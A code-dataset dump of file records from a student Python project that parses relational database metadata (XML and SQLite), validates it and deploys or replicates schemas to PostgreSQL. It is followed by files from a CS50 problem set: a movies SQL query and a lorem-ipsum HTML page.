Произвести валидауию объекта детали индекса.\n\n :return: None\n \"\"\"\n if detail.value is None:\n raise EmptyRequiredPropertyError('value')\n if detail.value not in table.fields:\n raise ElementReferenceError(detail.value)\n\n\nclass ValidationError(Exception):\n \"\"\" Подкласс исключений, порождаемых в процессе валидации схемы.\n \"\"\"\n pass\n\n\nclass EmptyRequiredPropertyError(ValidationError):\n \"\"\" Подкласс исключений, порождаемых в случае отсутствия определения обязательных\n свойств в структуре схемы.\n \"\"\"\n def __init__(self, prop):\n self.prop = prop\n\n def __str__(self):\n return 'Не определено обязательное свойство \\\"' + self.prop + '\\\"'\n\n\nclass UnsupportedDataTypeError(ValidationError):\n \"\"\" Подкласс исключений, порождаемых в случае использования неподдерживаемых\n типов данных.\n \"\"\"\n def __init__(self, _type):\n self.type = _type\n\n def __str__(self):\n return 'Задан неподдерживаемый тип данных \\\"' + self.type + '\\\"'\n\n\nclass ElementReferenceError(ValueError):\n \"\"\" Подкласс иключений, порождемых в случае обнаружения ссылок на неопределенные\n элементы Схемы.\n \"\"\"\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return 'Задана ссылка на неопределенный элемент \\\"' + self.name + '\\\"'\n\n\nclass UniqueViolationError(ValidationError):\n \"\"\" Подкласс исключений, порождаемых в случае нарушения уникальности элементов\n в разрезе некоторого свойства.\n \"\"\"\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return 'Элемент заданного типа с именем \\\"' + self.name + '\\\" уже определен'\n\n\nclass ForeignKeyError(ValidationError):\n \"\"\" Подкласс исключений, порождаемых в случае некорректного задания структуры\n Ограничения \"Внешний ключ\".\n \"\"\"\n def __str__(self):\n return 'Неверная структура ограничения \"Внешний ключ\"'\n"
},
{
"alpha_fraction": 0.5400857925415039,
"alphanum_fraction": 0.5400857925415039,
"avg_line_length": 23.844263076782227,
"blob_id": "b6ebd2692720666ef2aa09dbaee7cfa4fcaf2e70",
"content_id": "4e1e3bed9ef2b5f621fd3baae9c0d85b96c25e4c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3348,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 122,
"path": "/ram_repr/ram_structure.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий реализации классов представления базы в RAM.\n\"\"\"\n\n\nclass Schema:\n \"\"\" Класс, моделирующий схему базы.\n \"\"\"\n def __init__(self):\n self.fulltext_engine = None\n self.version = None\n self.name = None\n self.description = None\n\n self.domains = {}\n self.tables = {}\n self.data_types = ('STRING', 'SMALLINT', 'INTEGER', 'WORD', 'BOOLEAN', 'FLOAT', 'CURRENCY', 'BCD', 'FMTBCD',\n 'DATE', 'TIME', 'DATETIME', 'TIMESTAMP', 'BYTES', 'VARBYTES', 'BLOB', 'MEMO', 'GRAPHIC',\n 'FMTMEMO', 'FIXEDCHAR', 'WIDESTRING', 'LARGEINT', 'COMP', 'ARRAY', 'FIXEDWIDECHAR',\n 'WIDEMEMO', 'CODE', 'RECORDID', 'SET', 'PERIOD', 'BYTE'\n )\n\n\nclass Domain:\n \"\"\" Класс, реализующий представление домена в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.description = None\n self.type = None\n self.align = None\n self.width = None\n self.length = None\n self.precision = None\n self.char_length = None\n self.scale = None\n\n self.case_sensitive = False\n self.show_null = False\n self.show_lead_nulls = False\n self.thousands_separator = False\n self.summable = False\n\n\nclass Table:\n \"\"\" Класс, моделирующий таблицу базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.description = None\n self.temporal_mode = None\n self.means = None\n\n self.add = False\n self.edit = False\n self.delete = False\n\n self.fields = {}\n self.indexes = []\n self.constraints = []\n\n\nclass Field:\n \"\"\" Класс, моделирующий поле базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.rname = None\n self.domain = None\n self.type = None\n self.description = None\n\n self.input = False\n self.edit = False\n self.show_in_grid = False\n self.show_in_details = False\n self.is_mean = False\n self.autocalculated = False\n self.required = False\n\n\nclass Constraint:\n \"\"\" Класс, моделирующий ограничение базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.kind = None\n self.reference = None\n self.constraint = None\n self.expression = None\n self.cascading_delete = None\n\n self.has_value_edit = False\n\n self.details = []\n\n\nclass ConstraintDetail:\n \"\"\" Класс, моделирующий деталь ограничения базы в RAM.\n \"\"\"\n def __init__(self):\n self.value = None\n\n\nclass Index:\n \"\"\" Класс, моделирующий представление индекса базы в RAM.\n \"\"\"\n def __init__(self):\n self.name = None\n self.kind = None\n\n self.local = False\n\n self.details = []\n\n\nclass IndexDetail:\n \"\"\" Класс, моделирующий деталь индекса в базе.\n \"\"\"\n def __init__(self):\n self.value = None\n self.expression = None\n self.descend = None\n"
},
{
"alpha_fraction": 0.4821607172489166,
"alphanum_fraction": 0.4854951798915863,
"avg_line_length": 40.65277862548828,
"blob_id": "b5e08a98e6f98191fb7c4a0662f6dd9a13d2a836",
"content_id": "3a914ed0293c4abd134ea179a3bcc89d9ac63e5f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2999,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 72,
"path": "/db_replication/replication.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "import configparser\nimport pyodbc\n\nimport postgresql\n\nimport db_deploy.ddl_applying as ddl\nimport dbd_repr.dbd_to_ram as dbd2ram\n\n\nclass Replicator:\n def __init__(self, db_name: str):\n self.db_name = db_name\n self.schemas = dbd2ram.load(queries='../dbd_queries_mssql.cfg', db_config='../database.cfg')\n config = configparser.ConfigParser()\n config.read('../database.cfg', 'utf-8')\n\n self.mssql_server = config.get('SERVER', 'mssql_server')\n self.in_conn = pyodbc.connect(self.mssql_server)\n self.cursor = self.in_conn.cursor()\n\n self.postgres_server = config.get('SERVER', 'postgres_server')\n self.out_conn = postgresql.open(self.postgres_server)\n\n def __exit__(self):\n self.in_conn.close()\n self.out_conn.close()\n\n def create_empty_database(self):\n db = ddl.DbCreationConnection('../database.cfg', '../dbd_queries_mssql.cfg')\n db.deploy(db_name=self.db_name, schemas=self.schemas)\n self.out_conn.close()\n self.out_conn = postgresql.open(self.postgres_server + '/' + self.db_name.lower())\n\n def transfer_data(self):\n self.out_conn.execute('BEGIN TRANSACTION;')\n self.out_conn.execute('SET CONSTRAINTS ALL DEFERRED;')\n for schema in self.schemas:\n for table in schema.tables.values():\n self.cursor.execute(self.create_select_query(schema, table))\n batch = self.cursor.fetchmany(500)\n while len(batch) > 0:\n # batch_query = 'BEGIN TRANSACTION;\\n'\n batch_query = ''\n batch_query += ';\\n'.join(\n self.create_insert_query(schema, table, row)\n for row\n in batch\n )\n # batch_query += ';\\nCOMMIT TRANSACTION;'\n self.out_conn.execute(batch_query)\n batch = self.cursor.fetchmany(500)\n self.out_conn.execute('COMMIT TRANSACTION;')\n\n def create_select_query(self, schema, table):\n query = 'SELECT ' + ', '.join(['[' + field + ']' for field in table.fields]) + ' '\\\n 'FROM [' + schema.name + '].[' + table.name + ']'\n return query\n\n def create_insert_query(self, schema, table, values):\n query = 'INSERT INTO ' + '\"' + schema.name + '\".\"' + table.name + '\" '\\\n '(' + ', '.join(['\"' + field + '\"' for field in table.fields]) + ') '\\\n 'VALUES(' + ', '.join(\n ['\\'' +\n str(value)\n .replace('\\'', ' ')\n + '\\''\n if value is not None\n else 'NULL'\n for value\n in values\n ]) + ')'\n return query\n"
},
{
"alpha_fraction": 0.6209514141082764,
"alphanum_fraction": 0.6214575171470642,
"avg_line_length": 33.46511459350586,
"blob_id": "e05a652119bf7e1cd1504077c6c0394a42f20009",
"content_id": "5a9ecae24942bc09d00c1720305c7244f900738c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6910,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 172,
"path": "/db_deploy/ddl_applying.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "\"\"\" Модуль, содержащий методы, позволяющие сгенерировать пустую базу PostgreSQL, получив на вход файл с\nреляционным, либо текстовым предтсавлением метаданных.\n\"\"\"\nimport configparser\n\nimport postgresql\n\nfrom db_deploy.ddl_generator import DdlGenerator\nfrom dbd_repr import dbd_to_ram\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\nfrom xml_repr import xml_to_ram\n\n\nclass DbCreationConnection:\n \"\"\" Подключение к серверу БД, реализующее методы создания пустой базы.\n \"\"\"\n def __init__(self, server_config, queries: str):\n self.queries = queries\n self.file = open(server_config, encoding='utf-8')\n self.config = configparser.ConfigParser()\n self.config.read_file(self.file)\n self.conn = postgresql.open(self.config.get('SERVER', 'postgres_server'))\n self.gen = DdlGenerator()\n\n def __exit__(self):\n self.conn.close()\n\n def begin_transaction(self):\n \"\"\" Стартовать транзакцию.\n\n :return: None\n \"\"\"\n self.conn.execute('BEGIN TRANSACTION;')\n\n def commit(self):\n \"\"\" Зафиксировать транзакцию.\n\n :return: None\n \"\"\"\n self.conn.execute('COMMIT;')\n\n def create_and_connect_database(self, db_name: str):\n \"\"\" Создать на сервере новую БД и сделать ее активной.\n\n :param db_name: название создаваемой БД\n :return: None`\n \"\"\"\n self.conn.execute('DROP DATABASE IF EXISTS ' + db_name)\n self.conn.execute('CREATE DATABASE ' + db_name)\n self.conn.close()\n self.conn = postgresql.open(self.config.get('SERVER', 'postgres_server') + '/' + db_name.lower())\n\n def create_schema(self, schema: Schema):\n \"\"\" Создать в БД схему.\n\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_schema_dll(schema)\n self.conn.execute(ddl)\n\n def create_domain(self, domain: Domain, schema: Schema):\n \"\"\" Создать в БД домен.\n\n :param domain: объект домена.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_domain_dll(domain, schema)\n self.conn.execute(ddl)\n\n def create_table(self, table: Table, schema: Schema):\n \"\"\" Создать таблицу в БД.\n\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_table_ddl(table, schema)\n self.conn.execute(ddl)\n\n def create_constraint(self, constraint: Constraint, table: Table, schema: Schema):\n \"\"\" Создать ограничение в БД.\n\n :param constraint: объект индекса.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_constraint_ddl(constraint, table, schema)\n print(ddl)\n self.conn.execute(ddl)\n\n def create_index(self, index: Index, table: Table, schema: Schema):\n \"\"\" Создать индекс в БД.\n\n :param index: объект индекса.\n :param table: объект таблицы.\n :param schema: объект схемы.\n :return: None\n \"\"\"\n ddl = self.gen.create_index_ddl(index, table, schema)\n self.conn.execute(ddl)\n\n def deploy(self, db_name: str, repr_file: str=None, schemas: list=None):\n \"\"\" Создать пустую базу данных PostgreSQL из реляционного, либо текстового представления метеданных.\n\n :param db_name: название создаваемой базы данных.\n :param repr_file: файл текстового, либо реляционного представления метеданных.\n :param server_config: файл с конфигурацией сервера PostgreSQL\n :return: None\n \"\"\"\n if not schemas:\n if repr_file.endswith('.xml'):\n schemas = xml_to_ram.read(repr_file)\n elif repr_file.endswith('.db'):\n schemas = dbd_to_ram.load(queries=self.queries, db_file=repr_file)\n else:\n raise UnsupportedFileException()\n\n if schemas is None or len(schemas) == 0:\n raise UnsuccessfulTryException()\n\n self.create_and_connect_database(db_name)\n\n scripts = []\n scripts_foreign = []\n\n for schema in schemas:\n if len(schema.tables) == 0:\n continue\n scripts.append(self.gen.create_schema_dll(schema))\n for domain in schema.domains.values():\n scripts.append(self.gen.create_domain_dll(domain, schema))\n\n for table in schema.tables.values():\n scripts.append(self.gen.create_table_ddl(table, schema))\n\n for index in table.indexes:\n scripts.append(self.gen.create_index_ddl(index, table, schema))\n\n for constraint in table.constraints:\n if constraint.kind.upper() == 'FOREIGN':\n scripts_foreign.append(self.gen.create_constraint_ddl(constraint, table, schema))\n else:\n scripts.append(self.gen.create_constraint_ddl(constraint, table, schema))\n\n deploy = 'BEGIN TRANSACTION;'\n deploy += '\\n'.join(scripts)\n deploy += '\\n'.join(scripts_foreign)\n deploy += 'COMMIT;'\n self.conn.execute(deploy)\n\n\nclass UnsupportedFileException(Exception):\n \"\"\" Подкласс исключений, порождаемых в следствие невозможности открытия файла\n с целью считывания из него представления метеданных.\n \"\"\"\n def __str__(self):\n return 'Не удалось создать пустую БД. Неподдерживаемый файл.'\n\n\nclass UnsuccessfulTryException(Exception):\n \"\"\" Подкласс исключений, порождаемых в следсвтвие неуспешной попытки считвания\n метаданных из файла.\n \"\"\"\n def __str__(self):\n return 'Не удалось создать пустую БД. Считывание схемы из файла закончилось неудачей.'\n"
},
{
"alpha_fraction": 0.5678830146789551,
"alphanum_fraction": 0.5679500699043274,
"avg_line_length": 33.038814544677734,
"blob_id": "0698b2d89370f279f0d9f90e6763643105063516",
"content_id": "39b5c915fb59e606bde858f73887eabefe8f83c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16550,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 438,
"path": "/xml_repr/xml_to_ram.py",
"repo_name": "falcevor-study/relational-metadata-parser",
"src_encoding": "UTF-8",
"text": "from xml.dom.minidom import parse\n\nfrom ram_repr.ram_structure import Constraint\nfrom ram_repr.ram_structure import ConstraintDetail\nfrom ram_repr.ram_structure import Domain\nfrom ram_repr.ram_structure import Field\nfrom ram_repr.ram_structure import Index\nfrom ram_repr.ram_structure import IndexDetail\nfrom ram_repr.ram_structure import Schema\nfrom ram_repr.ram_structure import Table\nfrom ram_repr.ram_validation import validate_schema\n\n\ndef read(path):\n \"\"\" Считать модель базы из XML-файла.\n\n :param path: путь к XML-файлу с текстовым представлением базы.\n :return: список схем базы (на случай, если их более 1)\n \"\"\"\n schemas = []\n dom = parse(path)\n for child in dom.childNodes:\n if child.tagName == 'dbd_schema':\n schema = _parse_schema(child)\n validate_schema(schema)\n schemas.append(schema)\n else:\n raise UnsupportedTagError(child.tagName)\n return schemas\n\n\ndef _parse_schema(dom_schema):\n \"\"\" Преобразовать dom-структуру, представляющу схему базы, в объект.\n\n :param dom_schema: dom-структура схемы.\n :return: объект схемы.\n \"\"\"\n try:\n schema = _create_schema(dom_schema._attrs)\n except UnsupportedAttributeError as ex:\n raise ParseError('Не удалось создать схему. ' + str(ex))\n try:\n for child in dom_schema.childNodes:\n if _check_node(child):\n continue\n if child.tagName == 'domains':\n _parse_domain(schema, child)\n elif child.tagName == 'tables':\n _parse_table(schema, child)\n elif child.tagName != 'custom':\n raise UnsupportedTagError(child.tagName)\n except ParseError as ex:\n raise ParseError('Схема ' + schema.name + ': ' + str(ex))\n return schema\n\n\ndef _parse_domain(schema, dom):\n \"\"\" Преобразовать список dom-элементов, представляющих домены, в список доменов схемы.\n\n :param schema: схема, содержащая получаемые домены.\n :param dom: список dom-объектов доменов.\n :return: None\n \"\"\"\n domains = dom.childNodes\n try:\n for domain_element in domains:\n if _check_node(domain_element):\n continue\n if domain_element.tagName != 'domain':\n raise UnsupportedTagError(domain_element.tagName)\n domain = _create_domain(domain_element._attrs)\n if domain.name in schema.domains:\n raise UniqueViolationError(domain.name)\n schema.domains[domain.name] = domain\n except ParseError as ex:\n raise ParseError('Домен. ' + str(ex))\n\n\ndef _parse_table(schema, dom):\n \"\"\" Проебразовать список dom-элементов, представляющих таблицы, в список таблиц схемы.\n\n :param schema: схема, содержащая получаемые таблицы.\n :param dom: список dom-объектов таблиц.\n :return: None\n \"\"\"\n tables = dom.childNodes\n for table_element in tables:\n if _check_node(table_element):\n continue\n if table_element.tagName != 'table':\n raise UnsupportedTagError(table_element.tagName)\n table = _create_table(table_element._attrs)\n if table.name in schema.tables:\n raise UniqueViolationError(table.name)\n schema.tables[table.name] = table\n\n try:\n for child in table_element.childNodes:\n if _check_node(child):\n continue\n if child.tagName == 'field':\n field = _create_field(child._attrs)\n if field.name in table.fields:\n raise UniqueViolationError(field.name)\n table.fields[field.name] = field\n\n elif child.tagName == 'index':\n index = _create_index(child._attrs)\n table.indexes.append(index)\n for detail_node in child.childNodes:\n if _check_node(detail_node):\n continue\n if detail_node.tagName != 'item':\n raise UnsupportedTagError(detail_node.tagName)\n detail = _create_index_detail(detail_node._attrs)\n index.details.append(detail)\n\n elif child.tagName == 'constraint':\n constraint = _create_constraint(child._attrs)\n table.constraints.append(constraint)\n for detail_node in child.childNodes:\n if _check_node(detail_node):\n continue\n if detail_node.tagName != 'item':\n raise UnsupportedTagError(detail_node.tagName)\n detail = _create_constraint_detail(detail_node._attrs)\n constraint.details.append(detail)\n\n else:\n raise UnsupportedTagError(table_element.tagName)\n except ParseError as ex:\n raise ParseError('Таблица: \\\"' + table.name + '\\\". ' + str(ex))\n\n\ndef _check_node(node):\n \"\"\" Проверить узел dom-структуры.\n\n :param node: узел к проверке.\n :return: исключение в случае непустого узла.\n \"\"\"\n if node.nodeType == node.TEXT_NODE:\n if node.nodeValue.strip() != '':\n raise UnsupportedTagError(node.nodeValue)\n return True\n return False\n\n\ndef _create_schema(attr_dict):\n \"\"\" Создать объект Схемы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Схемы.\n \"\"\"\n schema = Schema()\n for attr in attr_dict:\n if attr == 'name':\n schema.name = attr_dict[attr].value\n elif attr == 'fulltext_engine':\n schema.fulltext_engine = attr_dict[attr].value\n elif attr == 'version':\n schema.version = attr_dict[attr].value\n elif attr == 'description':\n schema.description = attr_dict[attr].value\n else:\n raise UnsupportedAttributeError(attr)\n return schema\n\n\ndef _create_domain(attr_dict):\n \"\"\" Создать объект Домена, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Домена.\n \"\"\"\n domain = Domain()\n for attr in attr_dict:\n if attr == 'name':\n domain.name = attr_dict[attr].value\n elif attr == 'type':\n domain.type = attr_dict[attr].value\n elif attr == 'align':\n domain.align = attr_dict[attr].value\n elif attr == 'width':\n domain.width = attr_dict[attr].value\n elif attr == 'char_length':\n domain.char_length = attr_dict[attr].value\n elif attr == 'description':\n domain.description = attr_dict[attr].value\n elif attr == 'length':\n domain.length = attr_dict[attr].value\n elif attr == 'scale':\n domain.scale = attr_dict[attr].value\n elif attr == 'precision':\n domain.precision = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'case_sensitive':\n domain.case_sensitive = True\n elif prop == 'show_null':\n domain.show_null = True\n elif prop == 'show_lead_nulls':\n domain.show_lead_nulls = True\n elif prop == 'thousands_separator':\n domain.thousands_separator = True\n elif prop == 'summable':\n domain.summable = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return domain\n\n\ndef _create_table(attr_dict):\n \"\"\" Создать объект Таблицы, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Таблицы.\n \"\"\"\n table = Table()\n for attr in attr_dict:\n if attr == 'name':\n table.name = attr_dict[attr].value\n elif attr == 'description':\n table.description = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'add':\n table.add = True\n elif prop == 'edit':\n table.edit = True\n elif prop == 'delete':\n table.delete = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return table\n\n\ndef _create_field(attr_dict):\n \"\"\" Создать объект Поля, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Поля.\n \"\"\"\n field = Field()\n for attr in attr_dict:\n if attr == 'name':\n field.name = attr_dict[attr].value\n elif attr == 'rname':\n field.rname = attr_dict[attr].value\n elif attr == 'domain':\n field.domain = attr_dict[attr].value\n elif attr == 'type':\n field.type = attr_dict[attr].value\n elif attr == 'description':\n field.description = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'input':\n field.input = True\n elif prop == 'edit':\n field.edit = True\n elif prop == 'show_in_grid':\n field.show_in_grid = True\n elif prop == 'show_in_details':\n field.show_in_details = True\n elif prop == 'is_mean':\n field.is_mean = True\n elif prop == 'autocalculated':\n field.autocalculated = True\n elif prop == 'required':\n field.required = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return field\n\n\ndef _create_constraint(attr_dict):\n \"\"\" Создать объект Ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Ограничения.\n \"\"\"\n constraint = Constraint()\n\n if attr_dict is None:\n return constraint\n\n for attr in attr_dict:\n if attr == 'name':\n constraint.name = attr_dict[attr].value\n elif attr == 'kind':\n constraint.kind = attr_dict[attr].value\n elif attr == 'items':\n detail = ConstraintDetail()\n detail.value = attr_dict[attr].value\n constraint.details.append(detail)\n elif attr == 'reference':\n constraint.reference = attr_dict[attr].value\n elif attr == 'constraint':\n constraint.constraint = attr_dict[attr].value\n elif attr == 'expression':\n constraint.expression = attr_dict[attr].value\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'has_value_edit':\n constraint.has_value_edit = True\n elif prop == 'cascading_delete':\n constraint.cascading_delete = False\n elif prop == 'full_cascading_delete':\n constraint.cascading_delete = True\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return constraint\n\n\ndef _create_index(attr_dict):\n \"\"\" Создать объект Индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Индекса.\n \"\"\"\n index = Index()\n\n if attr_dict is None:\n return index\n\n for attr in attr_dict:\n if attr == 'name':\n index.name = attr_dict[attr].value\n elif attr == 'field':\n detail = IndexDetail()\n detail.value = attr_dict[attr].value\n index.details.append(detail)\n elif attr == 'props':\n for prop in attr_dict[attr].value.split(', '):\n if prop == 'local':\n index.local = True\n elif prop == 'uniqueness':\n index.kind = 'uniqueness'\n elif prop == 'fulltext':\n index.kind = 'fulltext'\n else:\n raise UnsupportedPropertyError(prop)\n else:\n raise UnsupportedAttributeError(attr)\n return index\n\n\ndef _create_constraint_detail(attr_dict):\n \"\"\" Создать объект Детали ограничения, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Детали ограничения.\n \"\"\"\n detail = ConstraintDetail()\n for attr in attr_dict:\n if attr == 'value':\n detail.value = attr_dict[attr].value\n else:\n raise UnsupportedAttributeError(attr)\n return detail\n\n\ndef _create_index_detail(attr_dict):\n \"\"\" Создать объект Детали индекса, опредлить его поля.\n\n :param attr_dict: Словарь свойств из dom-элемента.\n :return: объект Детали индекса.\n \"\"\"\n detail = IndexDetail()\n for attr in attr_dict:\n if attr == 'value':\n detail.value = attr_dict[attr].value\n elif attr == 'expression':\n detail.expression = attr_dict[attr].value\n elif attr == 'descend':\n detail.descend = attr_dict[attr].value\n else:\n raise UnsupportedAttributeError(attr)\n return detail\n\n\nclass ParseError(Exception):\n \"\"\" Подкласс исключений, порождаемых в процессе парсинга XML-представления\n схемы БД.\n \"\"\"\n pass\n\n\nclass UnsupportedTagError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого тега\n в XML-представлении БД.\n \"\"\"\n def __init__(self, tag):\n self.tag = tag\n\n def __str__(self):\n return 'Неподдерживаемый тэг \\\"' + self.tag + '\\\"'\n\n\nclass UnsupportedAttributeError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого\n атрибута в XML-представлении БД.\n \"\"\"\n def __init__(self, attribute):\n self.attribute = attribute\n\n def __str__(self):\n return 'Неподдерживаемый атрибут \\\"' + self.attribute + '\\\"'\n\n\nclass UnsupportedPropertyError(ParseError):\n \"\"\" Подкласс исключений, порождаемых при обнаружении неподдерживаемого\n свойства в XML-представлении БД.\n \"\"\"\n def __init__(self, prop):\n self.prop = prop\n\n def __str__(self):\n return 'Неподдерживаемое свойство \\\"' + self.prop + '\\\"'\n\n\nclass UniqueViolationError(ParseError):\n \"\"\" Подкласс исключений, порождаемых в случае нарушения уникальности\n имен некоторых элементов представления БД в виде XML.\n \"\"\"\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return 'Элемент заданного типа с именем \\\"' + self.name + '\\\" уже определен'"
}
] | 20 |
jmruzafa/cd50-problem-set
|
https://github.com/jmruzafa/cd50-problem-set
|
bce816af8bb3e20b66ac1d6084b563ad1f2d2449
|
e7ff8ec1df2bf64e84b78d4e580e088d182ec300
|
ab68f9ee060900d20101ecef46adfd46c7442c23
|
refs/heads/master
| 2022-10-12T03:24:09.461453 | 2020-06-10T17:47:14 | 2020-06-10T17:47:14 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 35,
"blob_id": "24249ebbd8217abae4e1f14b0a3c7b4ab7c030d1",
"content_id": "8abbf94a006de1323fae216c80f0d3290159424c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 4,
"path": "/pset7/movies/8.sql",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "SELECT p.name FROM people p\nINNER JOIN stars s on p.id = s.person_id\nINNER JOIN movies m ON m.id = s.movie_id\n WHERE m.title = \"Toy Story\""
},
{
"alpha_fraction": 0.7651899456977844,
"alphanum_fraction": 0.7660129070281982,
"avg_line_length": 139.21153259277344,
"blob_id": "1de807d0f61b627db2849bdf17c21dd32082287f",
"content_id": "bef8699224433dd393b890994298bbaeca33dca2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7291,
"license_type": "no_license",
"max_line_length": 850,
"num_lines": 52,
"path": "/pset8/web/homepage/about.html",
"repo_name": "jmruzafa/cd50-problem-set",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <link href=\"https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css\" rel=\"stylesheet\">\n <link href=\"styles.css\" rel=\"stylesheet\">\n <title>Matterhorn Expeditions</title>\n </head>\n <body>\n <header>\n <div class=\"main\">\n <div class=\"logo\">\n <a href=\"index.html\" >Matterhorn Experience</a>\n </div>\n <ul>\n <li><a href=\"index.html\">Home</a></li>\n <li><a href=\"expeditions.html\">Expeditions</a></li>\n <li><a href=\"about.html\">About</a></li>\n <li><a href=\"contact.html\">Contact</a></li>\n </ul>\n </div>\n </header>\n <div class=\"title\">\n <h1>About Us</h1>\n </div>\n <div class=\"container\">\n Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed tempor tempor consectetur. In elit odio, interdum eget malesuada id, cursus at est. Aenean volutpat faucibus sollicitudin. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Maecenas vehicula leo vel tellus pharetra iaculis. Mauris cursus pharetra metus. Aliquam erat volutpat. Quisque in ex porttitor, finibus quam ut, efficitur felis. Fusce fringilla nunc ac elit luctus, sed vestibulum mi accumsan. Nunc a felis ac mi ornare imperdiet non vitae felis. Morbi feugiat lorem vel commodo mollis. Vivamus et dolor eget nisl dignissim consequat. Pellentesque nisi ex, bibendum id metus placerat, egestas tempus velit. Nulla pharetra eget nisi ac luctus. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\n\nCurabitur nec gravida velit. Aenean fringilla quis risus et scelerisque. Maecenas bibendum est libero, ut viverra lacus venenatis in. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Sed vehicula in massa eu imperdiet. Sed pellentesque nisl eu nisi ultricies, ac lacinia dui elementum. Ut feugiat non ipsum sed malesuada. Nulla dignissim augue diam, feugiat varius quam rutrum ut.\n\nAenean cursus vel magna molestie condimentum. Aliquam neque lacus, euismod sit amet finibus ut, vestibulum eu odio. Phasellus sollicitudin, libero sed malesuada porttitor, lectus est volutpat erat, non viverra lorem nulla non ex. Quisque vel dui sit amet libero dignissim aliquet. In pretium faucibus est, sed mollis nisl aliquam eu. Vivamus id nulla ultrices mi rhoncus semper in nec nibh. Suspendisse consectetur nisi fermentum lacus volutpat pulvinar. Proin leo purus, faucibus ut dolor ut, consectetur bibendum sapien. Quisque vel porttitor turpis. Quisque dictum leo ut massa malesuada, ac sagittis erat euismod. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Donec iaculis, ligula non euismod aliquet, nisi lacus laoreet tellus, non interdum eros nulla non odio. Ut vitae tempor risus, eu tincidunt dui.\n\nCurabitur posuere enim sapien, congue elementum dui consequat cursus. Pellentesque sodales blandit justo, non laoreet dolor elementum sit amet. Integer justo eros, volutpat et pharetra nec, rhoncus sed justo. Quisque et fermentum metus. Pellentesque varius ipsum nulla, et tempus nisi posuere ornare. Pellentesque vitae est orci. Ut quis ex id lorem facilisis varius id sed est. Vivamus scelerisque mi nec felis sollicitudin, et commodo velit viverra. Aliquam vitae tellus tempus, tristique magna vel, auctor libero. Suspendisse maximus leo justo, quis sodales diam pharetra vel. Aenean metus tortor, tincidunt vel placerat id, scelerisque at turpis. Donec lacinia id lacus et pulvinar. Praesent pharetra justo quis neque vulputate, id ultrices ante hendrerit.\n\nNulla odio lectus, porta in lorem non, porttitor auctor nibh. Nunc ultrices est varius, aliquam erat non, dictum quam. Pellentesque viverra at elit vel suscipit. Curabitur sollicitudin auctor velit sit amet pellentesque. Nunc 